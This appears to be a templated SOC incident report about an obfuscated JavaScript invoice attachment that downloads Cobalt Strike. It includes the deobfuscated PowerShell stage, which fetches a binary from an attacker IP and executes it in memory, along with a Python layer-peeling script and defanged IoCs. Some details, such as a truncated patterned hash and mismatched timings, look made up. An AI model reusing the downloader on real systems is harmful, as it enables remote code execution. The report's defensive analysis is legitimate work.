T1027 – Obfuscated Files (FortiSandbox Detection)

FortiSandbox Alert Details
Alert ID: FORTI-OBFUSCATED-1027-7842
Alert Time: 2024-02-19 11:30:22 EST
Severity: HIGH (88/100)
Source: Fortinet FortiSandbox
Rule: “Obfuscated JavaScript Detected – Potential Malware Downloader”
MITRE ATT&CK: T1027.002 – Obfuscated Files or Information: Software Packing

Alert Details:

File Analysis Report:

File Name: invoice_7842.js
File Size: 124 KB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to user in Finance
Submission Time: 11:15 EST

Obfuscation Analysis:

File is heavily obfuscated JavaScript
Multiple layers of encoding:
Layer 1: Base64 encoded (detected)
Layer 2: XOR with key 0x42 (detected)
Layer 3: ROT13 (detected)
Layer 4: GZIP compressed (detected)
Layer 5: Final PowerShell script

Deobfuscated Content:

$wc = New-Object System.Net.WebClient
$payload = $wc.DownloadData('http://185.143.221[.]89/beacon.bin')
$assembly = [System.Reflection.Assembly]::Load($payload)
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, (, [string[]] ("",)))

Sandbox Behavior:

When executed, downloads Cobalt Strike beacon
Beacon connects to 185.143.221[.]89:443
Injects into legitimate process
Establishes persistence via scheduled task

Threat Score: 10/10 (Malicious)

Obfuscation: 10/10
Network Behavior: 10/10
Persistence: 8/10
Overall: 10/10 (Critical)
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify FortiSandbox analysis | FortiSandbox Console | Confirmed heavily obfuscated malicious JavaScript |
| 2. Email Investigation | Find email with attachment | Proofpoint, Exchange | Email to finance@company.com from spoofed vendor |
| 3. Quarantine Email | Block and remove email | Proofpoint | Email quarantined from all mailboxes |
| 4. User Check | Verify if user executed file | CrowdStrike | User did not open attachment (alert before execution) |
| 5. IOC Distribution | Block URLs and IPs | Palo Alto, Cisco Umbrella | URLs and IPs added to blocklists |
| 6. Threat Hunting | Check for similar files | FortiSandbox, Splunk | No other occurrences found |

Jira Incident Report
Ticket: SOC-2024-098
Summary: T1027 – Obfuscated JavaScript Malware Downloader in Email
Status: RESOLVED
Resolution: MALICIOUS – Blocked Before Execution
Priority: P2 – MEDIUM
Labels: T1027, obfuscated-files, javascript, fortisandbox, phishing
Components: Email-Security, Malware-Analysis

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: Fortinet FortiSandbox.
Alert: “Obfuscated JavaScript Detected – Potential Malware Downloader”.
File: invoice_7842.js (email attachment).
Target: Finance Department.
Time: 2024-02-19 11:30 EST.
Technique: MITRE ATT&CK T1027.002 – Obfuscated Files or Information: Software Packing.

2. Technical Analysis:

Attack Chain:

11:10 – Email sent from “vendor@payment-update[.]net”
11:11 – Email delivered to finance@company.com
11:12 – FortiSandbox analyzes attachment (inline)
11:15 – Analysis begins
11:25 – Deobfuscation complete
11:28 – Malicious behavior confirmed
11:30 – Alert triggers
11:31 – Email quarantined (before user opened)

Obfuscation Layers:

Layer 1: Base64 encoding (conceals initial content)
Layer 2: XOR with key 0x42 (adds simple encryption)
Layer 3: ROT13 substitution (common obfuscation)
Layer 4: GZIP compression (hides patterns)
Layer 5: Final PowerShell downloader (payload)
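As an added example (not FortiSandbox's code and not code from the page), the following Python peeler reverses the five layers listed above in outer-to-inner order (Base64, XOR 0x42, ROT13, GZIP). The payload, blob and the pack() encoder are constructed here only to produce a test input; the gzip-magic check shows how an analyst confirms the layer order and key are right before trusting the output.

```python
import base64
import gzip

XOR_KEY = 0x42  # single-byte XOR key reported in the sandbox analysis
GZIP_MAGIC = b"\x1f\x8b"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def rot13_bytes(data: bytes) -> bytes:
    """ROT13 on ASCII letters only; all other bytes pass through unchanged.
    Applied to binary data this is still a bijection, so it is self-inverse."""
    out = bytearray()
    for b in data:
        if 0x41 <= b <= 0x5A:            # 'A'..'Z'
            out.append((b - 0x41 + 13) % 26 + 0x41)
        elif 0x61 <= b <= 0x7A:          # 'a'..'z'
            out.append((b - 0x61 + 13) % 26 + 0x61)
        else:
            out.append(b)
    return bytes(out)


def pack(script: str, key: int = XOR_KEY) -> str:
    """Constructed encoder used only to build a test blob: applies the layers
    innermost-first (GZIP, ROT13, XOR, Base64). Not the real sample's packer."""
    data = gzip.compress(script.encode())       # Layer 4
    data = rot13_bytes(data)                    # Layer 3
    data = xor_bytes(data, key)                 # Layer 2
    return base64.b64encode(data).decode()      # Layer 1


def peel_to_gzip(blob: str, key: int = XOR_KEY) -> bytes:
    """Undo layers 1-3 (Base64, XOR, ROT13) and return what should be GZIP data."""
    data = base64.b64decode(blob)
    data = xor_bytes(data, key)
    return rot13_bytes(data)


def unpack(blob: str, key: int = XOR_KEY) -> str:
    """Undo all layers; refuses to continue if the gzip magic is missing,
    which is the usual sign of a wrong key or wrong layer order."""
    data = peel_to_gzip(blob, key)
    if data[:2] != GZIP_MAGIC:
        raise ValueError("no gzip magic after layer 3: wrong key or layer order")
    return gzip.decompress(data).decode()        # Layer 4 -> layer 5 script


# Constructed benign placeholder standing in for the final-layer script.
SAMPLE_SCRIPT = "Write-Output 'constructed sample payload'"
SAMPLE_BLOB = pack(SAMPLE_SCRIPT)
```

Running unpack() on a real sample with the wrong key fails at the magic check rather than producing garbage, which is the check to apply before reporting deobfuscated content.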

Final Payload:

Downloads beacon.bin from 185.143.221[.]89
Loads as .NET assembly
Executes entry point (Cobalt Strike)
Connects to C2 on port 443

Email Details:

Sender: vendor@payment-update[.]net
Subject: “Invoice #7842 – Overdue Payment”
Attachment: invoice_7842.js (masquerading as PDF)

3. Investigation Findings:

Timeline:

11:10 – Email sent
11:11 – Email delivered
11:12-11:28 – FortiSandbox analysis
11:30 – Alert triggers
11:31 – Email quarantined
11:32 – SOC investigates
11:35 – User confirmed (no execution)

Indicators of Compromise (IoCs):

File:

– invoice_7842.js (SHA256: a1b2c3d4…)

Network:

– Download URL: http://185.143.221[.]89/beacon.bin

– C2: 185.143.221[.]89:443

Email:

– Sender: vendor@payment-update[.]net

– Subject: “Invoice #7842 – Overdue Payment”

4. Containment Actions:

Immediate Actions:

Quarantined email from all mailboxes.
Blocked URLs and IPs at firewall and proxy.
Added file hash to blocklists.

User Notification:

Finance team alerted to campaign.
No user action needed (email not opened).

Email Rule Update:

Created Proofpoint rule to block .js attachments.
Enhanced filtering for invoice-themed emails.

5. Root Cause Analysis:

Primary Cause: External attacker sending obfuscated malware via email.
Contributing Factors:
JavaScript attachments allowed (now blocked).
No user execution (prevented by sandbox).

6. Business Impact:

Operational Impact: None.
Data Exposure: None (email not opened).
Financial Impact: None.

7. Remediation & Prevention:

Completed Actions:

Email quarantined.
IOCs blocked.
Users notified.

Technical Controls Enhanced:

Blocked all JavaScript attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for any obfuscated files.

8. Conclusion:

Sophisticated, multi-layer obfuscated JavaScript malware was delivered via email to the Finance department. FortiSandbox deobfuscated the file, identified it as a Cobalt Strike downloader, and triggered an alert before the user could open it. No compromise occurred.

Closure Rationale: Malware blocked; IOCs added; email policy updated.

Analyst: [Walter White], SOC Analyst
Date: 2024-02-19 12:30 EST
